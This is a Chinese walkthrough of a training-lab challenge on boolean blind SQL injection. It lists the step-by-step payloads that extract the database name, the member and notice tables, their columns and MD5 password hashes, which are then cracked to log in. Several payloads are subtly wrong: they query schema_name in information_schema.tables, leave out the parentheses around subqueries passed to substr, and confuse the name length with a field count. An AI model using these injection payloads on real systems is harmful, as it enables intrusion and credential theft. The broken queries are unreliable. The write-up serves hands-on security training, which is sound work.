墨者学院-SQL注入漏洞测试(布尔盲注)
拿到题目之后打开网站发现如下界面
本以为是输入框存在注入,结果发现并不是,而是下面一段小字,发现存在id=1的字样
手工注入:
前置知识!!!
1.information_schema.schemata 该表存储了数据库所有数据**库**名
其中schema_name为数据库的库名存在此表中
2.information_schema.tables该表在存储了数据库中的所有**表**名
table_schema 为数据库名
table_name为数据表名
table_rows为行的粗略估计
table_length记录表的大小
1.判断注入点:
首先应该判断是否有闭合字符,当输入and 1=1界面正常,and 1=2时界面错误,说明无闭合字符,为数字型注入。
2.爆破数据库:
因为已经知道数据库为mysql,则接下来爆数据库
一般用到的函数:
. concat(str1,str2,...)——没有分隔符地连接字符串
2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据
1. version()——MySQL 版本
2. user()——数据库用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
database()显示数据库名称,left(a,b)从左侧截取 a 的前 b 位
substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度
mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位
ascii(),将字符转为 ascii 值
and length(database())>5
利用二分法或者burp爆破模块跑出数据库的字段数为10,接下来爆破数据库名称
ascii(substr(database(),1,1))=48
通过burp爆破一般情况下跑48-127,来爆破出数据库名称:stormgroup
ps:导出名称的时候先将1250长字段标红,接下来筛选出高字段,接下来payload的降序一下,这样就是顺序,再导出payload2,这就是字段的ASCII值,之后转换就可以得到字段名称了
3.爆破数据表
1.爆破数据表:先跑出一共几个表
id=1 and (select count (table_name) from information_schema.tables where schema_name=database())=1
2.共两个表,接下来跑表的长度
id=1 and length((select table_name from information_schema.tables where schema_name=database() limit 0,1))=1
ps:这里注意要有两个括号,一个为length()函数自身括号,另一个为包裹查询这整个sql语句
3.两个表长度都为6,接下来爆表名
id=1 and ascii(substr(select table_name from information_schema.tables where schema_name=database() limit 0,1),1,1)=1
ps id=1 and ascii(substr(select table_name from information_schema.tables where schema_name=database() limit 0,1),1,1)=48 用burp跑这两个字段 下面同理
得到表名为**member和notice**
4.爆破字段
1.跑出每个表中有几个字段
(select count(column_name) from information_schema.columns where table_name='member')=1 得出第一张表有3个字段,第二章表有4个字段。
length((select column_name from information_schema.columns where table_name="member" limit 0,1))=1
得到member三个字段的长度分别为**4 8 6而notice字段的长度分别为2 5 7 4**
2.接下来字段名称
ascii(substr((select column_name from information_schema.columns where table_name="member" limit 0,1), 1,1))
得到member字段分别为name, password, status, 而notice字段分别为id, title,
3.同导出数据库名称一样越burp跑出共7个字段名
得到**member字段为name, password, status,** 而**notice字段分别为id, title, content, time**
4.判断password字段数,因为一般mysql都为md5加密,会很长,当然也可以在跑字段的时候password设置的长度大一点
length((select password from member limit 1,1))>5
之后爆破**name和password**字段
name都是mozhe,但password为32位md5值,共两个数据,跑出md5后转换一下,得到用户名与密码,进行最开始的登录界面,第一组用户显示被进禁止,第二组可以进入,并得到最后key值,key值为动态的,需要自己破解跑哦。
